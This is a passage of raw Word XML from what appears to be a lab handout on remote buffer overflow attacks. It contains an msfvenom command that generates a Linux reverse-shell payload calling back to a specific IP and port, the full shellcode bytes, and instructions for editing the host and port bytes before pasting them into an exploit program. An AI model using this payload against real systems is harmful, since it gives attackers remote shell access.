        <w:t xml:space="preserve"> and local port (client port) 9123, from where</w:t>
      </w:r>
      <w:r w:rsidR="0076168D">
        <w:t xml:space="preserve"> the client</w:t>
      </w:r>
      <w:r w:rsidR="00346429">
        <w:t xml:space="preserve"> will execute </w:t>
      </w:r>
      <w:r w:rsidR="0076168D">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00346429">
        <w:t>server’s shell command if the buffer overflow attack succeeds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FD008D" w14:textId="06CF3E23" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00AD5BF4"/>
    <w:p w14:paraId="578F8A52" w14:textId="38BA622D" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00AD5BF4"/>
    <w:p w14:paraId="615531E3" w14:textId="1C67ADA1" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00AD5BF4"/>
    <w:p w14:paraId="507CBCFF" w14:textId="5C6B75BA" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00AD5BF4"/>
    <w:p w14:paraId="26EB0C80" w14:textId="224B5F05" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00AD5BF4"/>
    <w:p w14:paraId="40891876" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00AD5BF4"/>
    <w:p w14:paraId="04518811" w14:textId="29491709" w:rsidR="0040431C" w:rsidRDefault="00346429" w:rsidP="002808A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F757874" wp14:editId="630F09E0">
                <wp:extent cx="5908110" cy="4221272"/>
                <wp:effectExtent l="0" t="0" r="16510" b="27305"/>
                <wp:docPr id="16" name="Text Box 16"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5908110" cy="4221272"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:ln w="6350">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4E75E902" w14:textId="77777777" w:rsidR="00346429" w:rsidRPr="00316182" w:rsidRDefault="00346429" w:rsidP="00346429">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="0070C0"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>C:\Users\yjlis&gt;</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00316182">
                              <w:rPr>
                                <w:color w:val="0070C0"/>
                              </w:rPr>
                              <w:t xml:space="preserve">msfvenom -p </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00316182">
                              <w:rPr>
                                <w:color w:val="0070C0"/>
                              </w:rPr>
                              <w:t>linux</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00316182">
                              <w:rPr>
                                <w:color w:val="0070C0"/>
                              </w:rPr>
                              <w:t>/x86/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00316182">
                              <w:rPr>
                                <w:color w:val="0070C0"/>
                              </w:rPr>
                              <w:t>shell_reverse_tcp</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00316182">
                              <w:rPr>
                                <w:color w:val="0070C0"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> LHOST=184.171.124.101 LPORT=9123 -f C</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1C78D922" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                            <w:r>
                              <w:t>C:/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11.1/lib/active_support/dependencies.rb:274: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="632E9F67" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                            <w:r>
                              <w:t xml:space="preserve">[-] No platform was selected, choosing </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Msf</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>::Module::Platform::Linux from the payload</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0EA61926" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                            <w:r>
                              <w:t>[-] No arch selected, selecting arch: x86 from the payload</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="151F7B68" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                            <w:r>
                              <w:t xml:space="preserve">No encoder or </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>badchars</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> specified, outputting raw payload</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="73CE0BE3" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                            <w:r>
                              <w:t>Payload size: 68 bytes</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="42AAEBC4" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                            <w:r>
                              <w:t>Final size of c file: 311 bytes</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3223920D" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                            <w:r>
                              <w:t xml:space="preserve">unsigned char </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00316182">
                              <w:rPr>
                                <w:color w:val="C00000"/>
                              </w:rPr>
                              <w:t>buf</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00316182">
                              <w:rPr>
                                <w:color w:val="C00000"/>
                              </w:rPr>
                              <w:t xml:space="preserve">[] </w:t>
                            </w:r>
                            <w:r>
                              <w:t>=</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="19A6BA04" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                            <w:r>
                              <w:t>"\x31\</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>xdb</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>xcd</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>\x80"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2C3AF542" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                            <w:r>
                              <w:t>"\x93\x59\xb0\x3f\</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>xcd</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>\x80\x49\x79\xf9\x68</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BA6EAF">
                              <w:rPr>
                                <w:color w:val="C00000"/>
                              </w:rPr>
                              <w:t>\xb8\</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00BA6EAF">
                              <w:rPr>
                                <w:color w:val="C00000"/>
                              </w:rPr>
                              <w:t>xab</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00BA6EAF">
                              <w:rPr>
                                <w:color w:val="C00000"/>
                              </w:rPr>
                              <w:t>\x7c\x65</w:t>
                            </w:r>
                            <w:r>
                              <w:t>\x68"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6CDFBB97" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                            <w:r>
                              <w:t>"\x02\x00</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BA6EAF">
                              <w:rPr>
                                <w:color w:val="C00000"/>
                              </w:rPr>
                              <w:t>\x23\xa3</w:t>
                            </w:r>
                            <w:r>
                              <w:t>\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5E2C8F28" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                            <w:r>
                              <w:t>"\</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>xcd</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0D90CDD0" w14:textId="6E7CE2BF" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                            <w:r>
                              <w:t>"\x52\x53\x89\xe1\xb0\x0b\</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>xcd</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>\x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757874" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 16" o:spid="_x0000_s1026" type="#_x0000_t202" style="width:465.2pt;height:3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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4E75E902" w14:textId="77777777" w:rsidR="00346429" w:rsidRPr="00316182" w:rsidRDefault="00346429" w:rsidP="00346429">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="0070C0"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>C:\Users\yjlis&gt;</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00316182">
                        <w:rPr>
                          <w:color w:val="0070C0"/>
                        </w:rPr>
                        <w:t xml:space="preserve">msfvenom -p </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00316182">
                        <w:rPr>
                          <w:color w:val="0070C0"/>
                        </w:rPr>
                        <w:t>linux</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00316182">
                        <w:rPr>
                          <w:color w:val="0070C0"/>
                        </w:rPr>
                        <w:t>/x86/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00316182">
                        <w:rPr>
                          <w:color w:val="0070C0"/>
                        </w:rPr>
                        <w:t>shell_reverse_tcp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00316182">
                        <w:rPr>
                          <w:color w:val="0070C0"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> LHOST=184.171.124.101 LPORT=9123 -f C</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1C78D922" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                      <w:r>
                        <w:t>C:/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11.1/lib/active_support/dependencies.rb:274: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="632E9F67" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                      <w:r>
                        <w:t xml:space="preserve">[-] No platform was selected, choosing </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>Msf</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>::</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t>Module::Platform::Linux from the payload</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0EA61926" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                      <w:r>
                        <w:t>[-] No arch selected, selecting arch: x86 from the payload</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="151F7B68" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                      <w:r>
                        <w:t xml:space="preserve">No encoder or </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>badchars</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> specified, outputting raw payload</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="73CE0BE3" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                      <w:r>
                        <w:t>Payload size: 68 bytes</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="42AAEBC4" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                      <w:r>
                        <w:t>Final size of c file: 311 bytes</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3223920D" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                      <w:r>
                        <w:t xml:space="preserve">unsigned char </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00316182">
                        <w:rPr>
                          <w:color w:val="C00000"/>
                        </w:rPr>
                        <w:t>buf</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00316182">
                        <w:rPr>
                          <w:color w:val="C00000"/>
                        </w:rPr>
                        <w:t>[</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00316182">
                        <w:rPr>
                          <w:color w:val="C00000"/>
                        </w:rPr>
                        <w:t xml:space="preserve">] </w:t>
                      </w:r>
                      <w:r>
                        <w:t>=</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="19A6BA04" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                      <w:r>
                        <w:t>"\x31\</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>xdb</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>xcd</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>\x80"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2C3AF542" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                      <w:r>
                        <w:t>"\x93\x59\xb0\x3f\</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>xcd</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>\x80\x49\x79\xf9\x68</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BA6EAF">
                        <w:rPr>
                          <w:color w:val="C00000"/>
                        </w:rPr>
                        <w:t>\xb8\</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00BA6EAF">
                        <w:rPr>
                          <w:color w:val="C00000"/>
                        </w:rPr>
                        <w:t>xab</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00BA6EAF">
                        <w:rPr>
                          <w:color w:val="C00000"/>
                        </w:rPr>
                        <w:t>\x7c\x65</w:t>
                      </w:r>
                      <w:r>
                        <w:t>\x68"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6CDFBB97" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                      <w:r>
                        <w:t>"\x02\x00</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00BA6EAF">
                        <w:rPr>
                          <w:color w:val="C00000"/>
                        </w:rPr>
                        <w:t>\x23\xa3</w:t>
                      </w:r>
                      <w:r>
                        <w:t>\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5E2C8F28" w14:textId="77777777" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                      <w:r>
                        <w:t>"\</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>xcd</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0D90CDD0" w14:textId="6E7CE2BF" w:rsidR="00346429" w:rsidRDefault="00346429" w:rsidP="00346429">
                      <w:r>
                        <w:t>"\x52\x53\x89\xe1\xb0\x0b\</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>xcd</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>\x80";</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="74056E7C" w14:textId="7A4BC3A5" w:rsidR="00647DFA" w:rsidRDefault="00647DFA" w:rsidP="002808A1">
      <w:r>
        <w:t xml:space="preserve">Note that in the above shellcode, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6EAF">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>\xb8\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA6EAF">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>xab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA6EAF">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>\x7c\x65</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00647DFA">
        <w:t>is the LHOST (\xb8 = 184, \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00647DFA">
        <w:t>xab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00647DFA">
        <w:t xml:space="preserve">=171, \x7c=124, \x65=101), and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6EAF">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>\x23\xa3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00647DFA">
        <w:t>is the LPORT (\x23\xa3=9123; you may use int2char.c to get this)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. You may replace them with your </w:t>
      </w:r>
      <w:r w:rsidR="0033227F">
        <w:t>specific numbers in exercise without regenerating the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643CA356" w14:textId="11884E51" w:rsidR="0040431C" w:rsidRDefault="00AD5BF4" w:rsidP="002808A1">
      <w:r w:rsidRPr="00AD5BF4">
        <w:t>The main part of the exploit program is as follow</w:t>
      </w:r>
      <w:r w:rsidR="00316182">
        <w:t xml:space="preserve"> (note that </w:t>
      </w:r>
      <w:r w:rsidR="00316182" w:rsidRPr="00316182">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode[] in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00316182" w:rsidRPr="00316182">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00316182" w:rsidRPr="00316182">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00316182">
        <w:t xml:space="preserve">is copy-pasted from the above </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00316182" w:rsidRPr="00316182">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00316182" w:rsidRPr="00316182">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidR="00316182">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104E45A4" w14:textId="70EDDC52" w:rsidR="0040431C" w:rsidRDefault="00C54190" w:rsidP="002808A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251752448" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="702A2D4C" wp14:editId="2DF4B85B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1336980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>76170</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12960" cy="94680"/>
                <wp:effectExtent l="57150" t="38100" r="44450" b="57785"/>
                <wp:wrapNone/>
                <wp:docPr id="54" name="Ink 54"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId75">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="12960" cy="94680"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="163FD1F8" id="Ink 54" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:104.55pt;margin-top:5.3pt;width:2.4pt;height:8.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">
                <v:imagedata r:id="rId76" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D85E38">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251728896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="388EDEA6" wp14:editId="17E78B0A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1356447</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1005440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="764088" cy="213186"/>
                <wp:effectExtent l="0" t="0" r="17145" b="15875"/>
                <wp:wrapNone/>
                <wp:docPr id="24" name="Text Box 24"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="764088" cy="213186"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:ln w="6350">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3FCA8CF1" w14:textId="33C2245F" w:rsidR="00D85E38" w:rsidRPr="00D85E38" w:rsidRDefault="00D85E38">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFC000"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00D85E38">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="FFC000"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>0xf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DEA6" id="Text Box 24" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:106.8pt;margin-top:79.15pt;width:60.15pt;height:1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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3FCA8CF1" w14:textId="33C2245F" w:rsidR="00D85E38" w:rsidRPr="00D85E38" w:rsidRDefault="00D85E38">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFC000"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00D85E38">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="FFC000"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>0xf0000000</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D83311">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08D4AF15" wp14:editId="4904A724">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>50104</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3536515</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5097658" cy="901874"/>
                <wp:effectExtent l="0" t="0" r="27305" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="18" name="Text Box 18"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5097658" cy="901874"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:ln w="6350">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7000A690" w14:textId="04B2D987" w:rsidR="00CE1109" w:rsidRPr="00703B5B" w:rsidRDefault="00CE1109" w:rsidP="00CE1109">
                            <w:pPr>
                              <w:spacing w:line="160" w:lineRule="exact"/>
                              <w:rPr>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                                <w:highlight w:val="yellow"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00703B5B">
                              <w:rPr>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
